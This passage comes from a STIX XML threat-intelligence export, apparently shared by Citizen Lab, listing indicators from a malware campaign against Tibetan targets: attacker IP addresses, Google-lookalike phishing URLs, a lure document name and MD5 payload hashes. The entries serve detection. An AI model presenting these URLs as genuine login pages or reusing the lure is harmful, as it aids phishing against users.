<indicator:Title>Network activity: 87.117.229.109 (MISP Attribute #516)</indicator:Title>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Malware Artifacts</indicator:Type>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">IP Watchlist</indicator:Type>
<indicator:Description>Network activity: 87.117.229.109 (MISP Attribute #516)</indicator:Description>
<indicator:Valid_Time_Position/>
<indicator:Observable id=":observable-c379b263-55d3-464d-b94f-178f02f883a8">
<cybox:Object id=":Address-c379b263-55d3-464d-b94f-178f02f883a8">
<cybox:Properties xsi:type="AddressObj:AddressObjectType" category="ipv4-addr" is_source="false">
<AddressObj:Address_Value condition="Equals">87.117.229.109</AddressObj:Address_Value>
</cybox:Properties>
</cybox:Object>
</indicator:Observable>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-5824e33f-4c08-4b5f-8092-497a8e96ca05" timestamp="2016-11-10T16:14:39+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Confidence timestamp="2016-11-10T16:12:57+00:00">
<stixCommon:Value xsi:type="stixVocabs:HighMediumLowVocab-1.0">High</stixCommon:Value>
<stixCommon:Description>Derived from MISP's IDS flag. If an attribute is marked for IDS exports, the confidence will be high, otherwise none</stixCommon:Description>
</indicator:Confidence>
</stixCommon:Indicator>
</incident:Related_Indicator>
<incident:Related_Indicator>
<stixCommon:Relationship>Network activity</stixCommon:Relationship>
<stixCommon:Indicator id=":indicator-ad5c4c3d-6194-4059-9aa1-1593b62d32a9" timestamp="2016-11-10T16:13:04+00:00" xsi:type='indicator:IndicatorType'>
<indicator:Title>Network activity: 109.169.40.172 (MISP Attribute #517)</indicator:Title>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Malware Artifacts</indicator:Type>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">IP Watchlist</indicator:Type>
<indicator:Description>Network activity: 109.169.40.172 (MISP Attribute #517)</indicator:Description>
<indicator:Valid_Time_Position/>
<indicator:Observable id=":observable-ad5c4c3d-6194-4059-9aa1-1593b62d32a9">
<cybox:Object id=":Address-ad5c4c3d-6194-4059-9aa1-1593b62d32a9">
<cybox:Properties xsi:type="AddressObj:AddressObjectType" category="ipv4-addr" is_source="false">
<AddressObj:Address_Value condition="Equals">109.169.40.172</AddressObj:Address_Value>
</cybox:Properties>
</cybox:Object>
</indicator:Observable>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-5824e33f-4c08-4b5f-8092-497a8e96ca05" timestamp="2016-11-10T16:14:39+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Confidence timestamp="2016-11-10T16:13:04+00:00">
<stixCommon:Value xsi:type="stixVocabs:HighMediumLowVocab-1.0">High</stixCommon:Value>
<stixCommon:Description>Derived from MISP's IDS flag. If an attribute is marked for IDS exports, the confidence will be high, otherwise none</stixCommon:Description>
</indicator:Confidence>
</stixCommon:Indicator>
</incident:Related_Indicator>
<incident:Related_Indicator>
<stixCommon:Relationship>Network activity</stixCommon:Relationship>
<stixCommon:Indicator id=":indicator-b2cebdea-e90b-416f-9a0f-94a566b32a2a" timestamp="2016-11-10T16:13:12+00:00" xsi:type='indicator:IndicatorType'>
<indicator:Title>Network activity: 46.127.56.109 (MISP Attribute #518)</indicator:Title>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Malware Artifacts</indicator:Type>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">IP Watchlist</indicator:Type>
<indicator:Description>Network activity: 46.127.56.109 (MISP Attribute #518)</indicator:Description>
<indicator:Valid_Time_Position/>
<indicator:Observable id=":observable-b2cebdea-e90b-416f-9a0f-94a566b32a2a">
<cybox:Object id=":Address-b2cebdea-e90b-416f-9a0f-94a566b32a2a">
<cybox:Properties xsi:type="AddressObj:AddressObjectType" category="ipv4-addr" is_source="false">
<AddressObj:Address_Value condition="Equals">46.127.56.109</AddressObj:Address_Value>
</cybox:Properties>
</cybox:Object>
</indicator:Observable>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-5824e33f-4c08-4b5f-8092-497a8e96ca05" timestamp="2016-11-10T16:14:39+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Confidence timestamp="2016-11-10T16:13:12+00:00">
<stixCommon:Value xsi:type="stixVocabs:HighMediumLowVocab-1.0">High</stixCommon:Value>
<stixCommon:Description>Derived from MISP's IDS flag. If an attribute is marked for IDS exports, the confidence will be high, otherwise none</stixCommon:Description>
</indicator:Confidence>
</stixCommon:Indicator>
</incident:Related_Indicator>
<incident:Related_Indicator>
<stixCommon:Relationship>Network activity</stixCommon:Relationship>
<stixCommon:Indicator id=":indicator-8ce49cb3-e458-4568-b560-04a314ce9539" timestamp="2016-11-10T16:13:20+00:00" xsi:type='indicator:IndicatorType'>
<indicator:Title>Network activity: 192.253.251.118 (MISP Attribute #519)</indicator:Title>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Malware Artifacts</indicator:Type>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">IP Watchlist</indicator:Type>
<indicator:Description>Network activity: 192.253.251.118 (MISP Attribute #519)</indicator:Description>
<indicator:Valid_Time_Position/>
<indicator:Observable id=":observable-8ce49cb3-e458-4568-b560-04a314ce9539">
<cybox:Object id=":Address-8ce49cb3-e458-4568-b560-04a314ce9539">
<cybox:Properties xsi:type="AddressObj:AddressObjectType" category="ipv4-addr" is_source="false">
<AddressObj:Address_Value condition="Equals">192.253.251.118</AddressObj:Address_Value>
</cybox:Properties>
</cybox:Object>
</indicator:Observable>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-5824e33f-4c08-4b5f-8092-497a8e96ca05" timestamp="2016-11-10T16:14:39+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Confidence timestamp="2016-11-10T16:13:20+00:00">
<stixCommon:Value xsi:type="stixVocabs:HighMediumLowVocab-1.0">High</stixCommon:Value>
<stixCommon:Description>Derived from MISP's IDS flag. If an attribute is marked for IDS exports, the confidence will be high, otherwise none</stixCommon:Description>
</indicator:Confidence>
</stixCommon:Indicator>
</incident:Related_Indicator>
<incident:Related_Indicator>
<stixCommon:Relationship>Network activity</stixCommon:Relationship>
<stixCommon:Indicator id=":indicator-53477c01-59ad-47be-b808-4c6b518523fc" timestamp="2016-11-10T16:08:11+00:00" xsi:type='indicator:IndicatorType'>
<indicator:Title>Network activity: 109.169.77.230 (MISP Attribute #511)</indicator:Title>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Malware Artifacts</indicator:Type>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">IP Watchlist</indicator:Type>
<indicator:Description>Network activity: 109.169.77.230 (MISP Attribute #511)</indicator:Description>
<indicator:Valid_Time_Position/>
<indicator:Observable id=":observable-53477c01-59ad-47be-b808-4c6b518523fc">
<cybox:Object id=":Address-53477c01-59ad-47be-b808-4c6b518523fc">
<cybox:Properties xsi:type="AddressObj:AddressObjectType" category="ipv4-addr" is_source="false">
<AddressObj:Address_Value condition="Equals">109.169.77.230</AddressObj:Address_Value>
</cybox:Properties>
</cybox:Object>
</indicator:Observable>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-5824e33f-4c08-4b5f-8092-497a8e96ca05" timestamp="2016-11-10T16:14:39+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Confidence timestamp="2016-11-10T16:08:11+00:00">
<stixCommon:Value xsi:type="stixVocabs:HighMediumLowVocab-1.0">High</stixCommon:Value>
<stixCommon:Description>Derived from MISP's IDS flag. If an attribute is marked for IDS exports, the confidence will be high, otherwise none</stixCommon:Description>
</indicator:Confidence>
</stixCommon:Indicator>
</incident:Related_Indicator>
<incident:Related_Indicator>
<stixCommon:Relationship>Network activity</stixCommon:Relationship>
<stixCommon:Indicator id=":indicator-fc6d0f74-9e43-44a7-b7b8-0ca5c7c487e6" timestamp="2016-11-10T16:12:23+00:00" xsi:type='indicator:IndicatorType'>
<indicator:Title>Network activity: http://filegoogle.firewall-gateway.com/servicelogin (MISP Attribute #520)</indicator:Title>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Malware Artifacts</indicator:Type>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">URL Watchlist</indicator:Type>
<indicator:Description>Network activity: http://filegoogle.firewall-gateway.com/servicelogin (MISP Attribute #520)</indicator:Description>
<indicator:Valid_Time_Position/>
<indicator:Observable id=":observable-fc6d0f74-9e43-44a7-b7b8-0ca5c7c487e6">
<cybox:Object id=":URI-fc6d0f74-9e43-44a7-b7b8-0ca5c7c487e6">
<cybox:Properties xsi:type="URIObj:URIObjectType">
<URIObj:Value condition="Equals">http://filegoogle.firewall-gateway.com/servicelogin</URIObj:Value>
</cybox:Properties>
</cybox:Object>
</indicator:Observable>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-5824e33f-4c08-4b5f-8092-497a8e96ca05" timestamp="2016-11-10T16:14:39+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Confidence timestamp="2016-11-10T16:12:23+00:00">
<stixCommon:Value xsi:type="stixVocabs:HighMediumLowVocab-1.0">High</stixCommon:Value>
<stixCommon:Description>Derived from MISP's IDS flag. If an attribute is marked for IDS exports, the confidence will be high, otherwise none</stixCommon:Description>
</indicator:Confidence>
</stixCommon:Indicator>
</incident:Related_Indicator>
<incident:Related_Indicator>
<stixCommon:Relationship>Network activity</stixCommon:Relationship>
<stixCommon:Indicator id=":indicator-11bb35af-5ad7-4a10-844c-fb4482603b0b" timestamp="2016-11-10T16:12:41+00:00" xsi:type='indicator:IndicatorType'>
<indicator:Title>Network activity: http://accountgoogle.firewall-gateway.com/serviclogin (MISP Attribute #521)</indicator:Title>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Malware Artifacts</indicator:Type>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">URL Watchlist</indicator:Type>
<indicator:Description>Network activity: http://accountgoogle.firewall-gateway.com/serviclogin (MISP Attribute #521)</indicator:Description>
<indicator:Valid_Time_Position/>
<indicator:Observable id=":observable-11bb35af-5ad7-4a10-844c-fb4482603b0b">
<cybox:Object id=":URI-11bb35af-5ad7-4a10-844c-fb4482603b0b">
<cybox:Properties xsi:type="URIObj:URIObjectType">
<URIObj:Value condition="Equals">http://accountgoogle.firewall-gateway.com/serviclogin</URIObj:Value>
</cybox:Properties>
</cybox:Object>
</indicator:Observable>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-5824e33f-4c08-4b5f-8092-497a8e96ca05" timestamp="2016-11-10T16:14:39+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Confidence timestamp="2016-11-10T16:12:41+00:00">
<stixCommon:Value xsi:type="stixVocabs:HighMediumLowVocab-1.0">None</stixCommon:Value>
<stixCommon:Description>Derived from MISP's IDS flag. If an attribute is marked for IDS exports, the confidence will be high, otherwise none</stixCommon:Description>
</indicator:Confidence>
</stixCommon:Indicator>
</incident:Related_Indicator>
<incident:Related_Indicator>
<stixCommon:Relationship>Network activity</stixCommon:Relationship>
<stixCommon:Indicator id=":indicator-cda51492-e33b-4521-be3b-35ec4b8bc9b4" timestamp="2016-11-10T16:12:15+00:00" xsi:type='indicator:IndicatorType'>
<indicator:Title>Network activity: http://accountgoogle.firewall-gateway.com/servicclogin (MISP Attribute #522)</indicator:Title>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Malware Artifacts</indicator:Type>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">URL Watchlist</indicator:Type>
<indicator:Description>Network activity: http://accountgoogle.firewall-gateway.com/servicclogin (MISP Attribute #522)</indicator:Description>
<indicator:Valid_Time_Position/>
<indicator:Observable id=":observable-cda51492-e33b-4521-be3b-35ec4b8bc9b4">
<cybox:Object id=":URI-cda51492-e33b-4521-be3b-35ec4b8bc9b4">
<cybox:Properties xsi:type="URIObj:URIObjectType">
<URIObj:Value condition="Equals">http://accountgoogle.firewall-gateway.com/servicclogin</URIObj:Value>
</cybox:Properties>
</cybox:Object>
</indicator:Observable>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-5824e33f-4c08-4b5f-8092-497a8e96ca05" timestamp="2016-11-10T16:14:39+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Confidence timestamp="2016-11-10T16:12:15+00:00">
<stixCommon:Value xsi:type="stixVocabs:HighMediumLowVocab-1.0">None</stixCommon:Value>
<stixCommon:Description>Derived from MISP's IDS flag. If an attribute is marked for IDS exports, the confidence will be high, otherwise none</stixCommon:Description>
</indicator:Confidence>
</stixCommon:Indicator>
</incident:Related_Indicator>
<incident:Related_Indicator>
<stixCommon:Relationship>Payload delivery</stixCommon:Relationship>
<stixCommon:Indicator id=":indicator-633179a0-3d6e-4ca5-9b89-02d8522ef275" timestamp="2016-11-10T16:10:34+00:00" xsi:type='indicator:IndicatorType'>
<indicator:Title>Payload delivery: Reappraisal_of_India_Tibet_Policy.doc (MISP Attribute #530)</indicator:Title>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Malware Artifacts</indicator:Type>
<indicator:Description>Payload delivery: Reappraisal_of_India_Tibet_Policy.doc (MISP Attribute #530)</indicator:Description>
<indicator:Valid_Time_Position/>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-5824e33f-4c08-4b5f-8092-497a8e96ca05" timestamp="2016-11-10T16:14:39+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Confidence timestamp="2016-11-10T16:10:34+00:00">
<stixCommon:Value xsi:type="stixVocabs:HighMediumLowVocab-1.0">None</stixCommon:Value>
<stixCommon:Description>Derived from MISP's IDS flag. If an attribute is marked for IDS exports, the confidence will be high, otherwise none</stixCommon:Description>
</indicator:Confidence>
</stixCommon:Indicator>
</incident:Related_Indicator>
<incident:Related_Indicator>
<stixCommon:Relationship>Payload delivery</stixCommon:Relationship>
<stixCommon:Indicator id=":indicator-99702482-486a-4b63-8fa9-f094835827b2" timestamp="2016-11-10T16:06:29+00:00" xsi:type='indicator:IndicatorType'>
<indicator:Title>Payload delivery: 5c030802ad411fea059cc9cc4c118125 (MISP Attribute #531)</indicator:Title>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Malware Artifacts</indicator:Type>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">File Hash Watchlist</indicator:Type>
<indicator:Description>Payload delivery: 5c030802ad411fea059cc9cc4c118125 (MISP Attribute #531)</indicator:Description>
<indicator:Valid_Time_Position/>
<indicator:Observable id=":observable-99702482-486a-4b63-8fa9-f094835827b2">
<cybox:Object id=":File-99702482-486a-4b63-8fa9-f094835827b2">
<cybox:Properties xsi:type="FileObj:FileObjectType">
<FileObj:Hashes>
<cyboxCommon:Hash>
<cyboxCommon:Type condition="Equals" xsi:type="cyboxVocabs:HashNameVocab-1.0">MD5</cyboxCommon:Type>
<cyboxCommon:Simple_Hash_Value condition="Equals">5c030802ad411fea059cc9cc4c118125</cyboxCommon:Simple_Hash_Value>
</cyboxCommon:Hash>
</FileObj:Hashes>
</cybox:Properties>
</cybox:Object>
</indicator:Observable>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-5824e33f-4c08-4b5f-8092-497a8e96ca05" timestamp="2016-11-10T16:14:39+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Confidence timestamp="2016-11-10T16:06:29+00:00">
<stixCommon:Value xsi:type="stixVocabs:HighMediumLowVocab-1.0">High</stixCommon:Value>
<stixCommon:Description>Derived from MISP's IDS flag. If an attribute is marked for IDS exports, the confidence will be high, otherwise none</stixCommon:Description>
</indicator:Confidence>
</stixCommon:Indicator>
</incident:Related_Indicator>
<incident:Related_Indicator>
<stixCommon:Relationship>Payload delivery</stixCommon:Relationship>
<stixCommon:Indicator id=":indicator-a95b5c9c-7ec9-42ff-a12c-075b3255de77" timestamp="2016-11-10T16:05:58+00:00" xsi:type='indicator:IndicatorType'>
<indicator:Title>Payload delivery: 7735e571d0450e2a31e97e4f8e0f66fa (MISP Attribute #532)</indicator:Title>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Malware Artifacts</indicator:Type>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">File Hash Watchlist</indicator:Type>
<indicator:Description>Payload delivery: 7735e571d0450e2a31e97e4f8e0f66fa (MISP Attribute #532)</indicator:Description>
<indicator:Valid_Time_Position/>
<indicator:Observable id=":observable-a95b5c9c-7ec9-42ff-a12c-075b3255de77">
<cybox:Object id=":File-a95b5c9c-7ec9-42ff-a12c-075b3255de77">
<cybox:Properties xsi:type="FileObj:FileObjectType">
<FileObj:Hashes>
<cyboxCommon:Hash>
<cyboxCommon:Type condition="Equals" xsi:type="cyboxVocabs:HashNameVocab-1.0">MD5</cyboxCommon:Type>
<cyboxCommon:Simple_Hash_Value condition="Equals">7735e571d0450e2a31e97e4f8e0f66fa</cyboxCommon:Simple_Hash_Value>
</cyboxCommon:Hash>
</FileObj:Hashes>
</cybox:Properties>
</cybox:Object>
</indicator:Observable>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-5824e33f-4c08-4b5f-8092-497a8e96ca05" timestamp="2016-11-10T16:14:39+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Confidence timestamp="2016-11-10T16:05:58+00:00">
<stixCommon:Value xsi:type="stixVocabs:HighMediumLowVocab-1.0">High</stixCommon:Value>
<stixCommon:Description>Derived from MISP's IDS flag. If an attribute is marked for IDS exports, the confidence will be high, otherwise none</stixCommon:Description>
</indicator:Confidence>
</stixCommon:Indicator>
</incident:Related_Indicator>
<incident:Related_Indicator>
<stixCommon:Relationship>Payload delivery</stixCommon:Relationship>
<stixCommon:Indicator id=":indicator-baf16087-e811-438d-bcdd-9779043dfb06" timestamp="2016-11-10T16:05:33+00:00" xsi:type='indicator:IndicatorType'>
<indicator:Title>Payload delivery: d2e9412428c3bcf3ec98dba8a78adb7b (MISP Attribute #533)</indicator:Title>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Malware Artifacts</indicator:Type>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">File Hash Watchlist</indicator:Type>
<indicator:Description>Payload delivery: d2e9412428c3bcf3ec98dba8a78adb7b (MISP Attribute #533)</indicator:Description>
<indicator:Valid_Time_Position/>
<indicator:Observable id=":observable-baf16087-e811-438d-bcdd-9779043dfb06">
<cybox:Object id=":File-baf16087-e811-438d-bcdd-9779043dfb06">
<cybox:Properties xsi:type="FileObj:FileObjectType">
<FileObj:Hashes>
<cyboxCommon:Hash>
<cyboxCommon:Type condition="Equals" xsi:type="cyboxVocabs:HashNameVocab-1.0">MD5</cyboxCommon:Type>
<cyboxCommon:Simple_Hash_Value condition="Equals">d2e9412428c3bcf3ec98dba8a78adb7b</cyboxCommon:Simple_Hash_Value>
</cyboxCommon:Hash>
</FileObj:Hashes>
</cybox:Properties>
</cybox:Object>
</indicator:Observable>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-5824e33f-4c08-4b5f-8092-497a8e96ca05" timestamp="2016-11-10T16:14:39+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Confidence timestamp="2016-11-10T16:05:33+00:00">
<stixCommon:Value xsi:type="stixVocabs:HighMediumLowVocab-1.0">High</stixCommon:Value>
<stixCommon:Description>Derived from MISP's IDS flag. If an attribute is marked for IDS exports, the confidence will be high, otherwise none</stixCommon:Description>
</indicator:Confidence>
</stixCommon:Indicator>
</incident:Related_Indicator>
<incident:Related_Indicator>
<stixCommon:Relationship>Payload delivery</stixCommon:Relationship>
<stixCommon:Indicator id=":indicator-712c9cc1-2b2b-4636-87d2-12bd313376dc" timestamp="2016-11-10T16:05:20+00:00" xsi:type='indicator:IndicatorType'>
<indicator:Title>Payload delivery: 1bf438b5744db73eea58379a3b9f30e5 (MISP Attribute #534)</indicator:Title>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Malware Artifacts</indicator:Type>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">File Hash Watchlist</indicator:Type>
<indicator:Description>Payload delivery: 1bf438b5744db73eea58379a3b9f30e5 (MISP Attribute #534)</indicator:Description>
<indicator:Valid_Time_Position/>
<indicator:Observable id=":observable-712c9cc1-2b2b-4636-87d2-12bd313376dc">
<cybox:Object id=":File-712c9cc1-2b2b-4636-87d2-12bd313376dc">
<cybox:Properties xsi:type="FileObj:FileObjectType">
<FileObj:Hashes>
<cyboxCommon:Hash>
<cyboxCommon:Type condition="Equals" xsi:type="cyboxVocabs:HashNameVocab-1.0">MD5</cyboxCommon:Type>
<cyboxCommon:Simple_Hash_Value condition="Equals">1bf438b5744db73eea58379a3b9f30e5</cyboxCommon:Simple_Hash_Value>
</cyboxCommon:Hash>
</FileObj:Hashes>
</cybox:Properties>
</cybox:Object>
</indicator:Observable>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-5824e33f-4c08-4b5f-8092-497a8e96ca05" timestamp="2016-11-10T16:14:39+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Confidence timestamp="2016-11-10T16:05:20+00:00">
<stixCommon:Value xsi:type="stixVocabs:HighMediumLowVocab-1.0">High</stixCommon:Value>
<stixCommon:Description>Derived from MISP's IDS flag. If an attribute is marked for IDS exports, the confidence will be high, otherwise none</stixCommon:Description>
</indicator:Confidence>
</stixCommon:Indicator>
</incident:Related_Indicator>
<incident:Related_Indicator>
<stixCommon:Relationship>Payload delivery</stixCommon:Relationship>
<stixCommon:Indicator id=":indicator-6d15c4fe-2de7-4abc-9593-c9eeae9b928f" timestamp="2016-11-10T16:05:09+00:00" xsi:type='indicator:IndicatorType'>
<indicator:Title>Payload delivery: 3b869c8e23d66ad0527882fc79ff7237 (MISP Attribute #535)</indicator:Title>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Malware Artifacts</indicator:Type>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">File Hash Watchlist</indicator:Type>
<indicator:Description>Payload delivery: 3b869c8e23d66ad0527882fc79ff7237 (MISP Attribute #535)</indicator:Description>
<indicator:Valid_Time_Position/>
<indicator:Observable id=":observable-6d15c4fe-2de7-4abc-9593-c9eeae9b928f">
<cybox:Object id=":File-6d15c4fe-2de7-4abc-9593-c9eeae9b928f">
<cybox:Properties xsi:type="FileObj:FileObjectType">
<FileObj:Hashes>
<cyboxCommon:Hash>
<cyboxCommon:Type condition="Equals" xsi:type="cyboxVocabs:HashNameVocab-1.0">MD5</cyboxCommon:Type>
<cyboxCommon:Simple_Hash_Value condition="Equals">3b869c8e23d66ad0527882fc79ff7237</cyboxCommon:Simple_Hash_Value>
</cyboxCommon:Hash>
</FileObj:Hashes>
</cybox:Properties>
</cybox:Object>
</indicator:Observable>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-5824e33f-4c08-4b5f-8092-497a8e96ca05" timestamp="2016-11-10T16:14:39+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Confidence timestamp="2016-11-10T16:05:09+00:00">
<stixCommon:Value xsi:type="stixVocabs:HighMediumLowVocab-1.0">High</stixCommon:Value>
<stixCommon:Description>Derived from MISP's IDS flag. If an attribute is marked for IDS exports, the confidence will be high, otherwise none</stixCommon:Description>
</indicator:Confidence>
</stixCommon:Indicator>
</incident:Related_Indicator>
<incident:Related_Indicator>
<stixCommon:Relationship>Payload delivery</stixCommon:Relationship>
<stixCommon:Indicator id=":indicator-23403344-c52e-4c19-9f7b-f5291b451bee" timestamp="2016-11-10T16:04:24+00:00" xsi:type='indicator:IndicatorType'>
<indicator:Title>Payload delivery: fef27f432e0ae8218143bc410fda340e (MISP Attribute #536)</indicator:Title>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Malware Artifacts</indicator:Type>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">File Hash Watchlist</indicator:Type>
<indicator:Description>Payload delivery: fef27f432e0ae8218143bc410fda340e (MISP Attribute #536)</indicator:Description>
<indicator:Valid_Time_Position/>
<indicator:Observable id=":observable-23403344-c52e-4c19-9f7b-f5291b451bee">
<cybox:Object id=":File-23403344-c52e-4c19-9f7b-f5291b451bee">
<cybox:Properties xsi:type="FileObj:FileObjectType">
<FileObj:Hashes>
<cyboxCommon:Hash>
<cyboxCommon:Type condition="Equals" xsi:type="cyboxVocabs:HashNameVocab-1.0">MD5</cyboxCommon:Type>
<cyboxCommon:Simple_Hash_Value condition="Equals">fef27f432e0ae8218143bc410fda340e</cyboxCommon:Simple_Hash_Value>
</cyboxCommon:Hash>
</FileObj:Hashes>
</cybox:Properties>
</cybox:Object>
</indicator:Observable>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-5824e33f-4c08-4b5f-8092-497a8e96ca05" timestamp="2016-11-10T16:14:39+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Confidence timestamp="2016-11-10T16:04:24+00:00">
<stixCommon:Value xsi:type="stixVocabs:HighMediumLowVocab-1.0">High</stixCommon:Value>
<stixCommon:Description>Derived from MISP's IDS flag. If an attribute is marked for IDS exports, the confidence will be high, otherwise none</stixCommon:Description>
</indicator:Confidence>
</stixCommon:Indicator>
</incident:Related_Indicator>
<incident:Related_Indicator>
<stixCommon:Relationship>Payload delivery</stixCommon:Relationship>
<stixCommon:Indicator id=":indicator-dbabd2ee-213d-4b02-951f-a020cfc3582e" timestamp="2016-11-10T16:07:46+00:00" xsi:type='indicator:IndicatorType'>
<indicator:Title>Payload delivery: 8b83fc5d3a6a80281269f9e337fe3fff (MISP Attribute #537)</indicator:Title>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Malware Artifacts</indicator:Type>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">File Hash Watchlist</indicator:Type>
<indicator:Description>Payload delivery: 8b83fc5d3a6a80281269f9e337fe3fff (MISP Attribute #537)</indicator:Description>
<indicator:Valid_Time_Position/>
<indicator:Observable id=":observable-dbabd2ee-213d-4b02-951f-a020cfc3582e">
<cybox:Object id=":File-dbabd2ee-213d-4b02-951f-a020cfc3582e">
<cybox:Properties xsi:type="FileObj:FileObjectType">
<FileObj:Hashes>
<cyboxCommon:Hash>
<cyboxCommon:Type condition="Equals" xsi:type="cyboxVocabs:HashNameVocab-1.0">MD5</cyboxCommon:Type>
<cyboxCommon:Simple_Hash_Value condition="Equals">8b83fc5d3a6a80281269f9e337fe3fff</cyboxCommon:Simple_Hash_Value>
</cyboxCommon:Hash>
</FileObj:Hashes>
</cybox:Properties>
</cybox:Object>
</indicator:Observable>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-5824e33f-4c08-4b5f-8092-497a8e96ca05" timestamp="2016-11-10T16:14:39+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Confidence timestamp="2016-11-10T16:07:46+00:00">
<stixCommon:Value xsi:type="stixVocabs:HighMediumLowVocab-1.0">High</stixCommon:Value>
<stixCommon:Description>Derived from MISP's IDS flag. If an attribute is marked for IDS exports, the confidence will be high, otherwise none</stixCommon:Description>
</indicator:Confidence>
</stixCommon:Indicator>
</incident:Related_Indicator>
</incident:Related_Indicators>
<incident:Leveraged_TTPs>
<incident:Leveraged_TTP>
<stixCommon:Relationship>Payload type</stixCommon:Relationship>
<stixCommon:TTP idref=":ttp-5824e33f-4c08-4b5f-8092-497a8e96ca05" timestamp="2016-11-10T16:14:39+00:00" xsi:type='ttp:TTPType'/>
</incident:Leveraged_TTP>
</incident:Leveraged_TTPs>
<incident:History>
<incident:History_Item>
<incident:Journal_Entry time_precision="second">Event Threat Level: Medium</incident:Journal_Entry>
</incident:History_Item>
<incident:History_Item>
<incident:Journal_Entry time_precision="second">MISP Tag: TLP:GREEN</incident:Journal_Entry>
</incident:History_Item>
<incident:History_Item>
<incident:Journal_Entry time_precision="second">MISP Tag: SOURCE:CITIZENLAB</incident:Journal_Entry>
</incident:History_Item>
<incident:History_Item>
<incident:Journal_Entry time_precision="second">MISP Tag: DETECT</incident:Journal_Entry>
</incident:History_Item>
<incident:History_Item>
<incident:Journal_Entry time_precision="second">MISP Tag: PUBLISHED</incident:Journal_Entry>
</incident:History_Item>
<incident:History_Item>
<incident:Journal_Entry time_precision="second">MISP Tag: TARGET:TIBETAN</incident:Journal_Entry>
</incident:History_Item>
</incident:History>
<incident:Information_Source>
<stixCommon:Identity>
<stixCommon:Name>citizenlab</stixCommon:Name>
</stixCommon:Identity>
<stixCommon:References>
<stixCommon:Reference>https://citizenlab.org/2016/03/shifting-tactics/</stixCommon:Reference>
</stixCommon:References>
</incident:Information_Source>
<incident:Handling>
<marking:Marking>
<marking:Controlled_Structure>../../../descendant-or-self::node()</marking:Controlled_Structure>
<marking:Marking_Structure xsi:type='tlpMarking:TLPMarkingStructureType' color="GREEN"/>
</marking:Marking>
</incident:Handling>
</stix:Incident>
</stix:Incidents>
</stix:Package>
</stix:Related_Package>
</stix:Related_Packages>
</stix:STIX_Package>

View File

@@ -0,0 +1,9 @@
## UP007 & SLServer IOCs
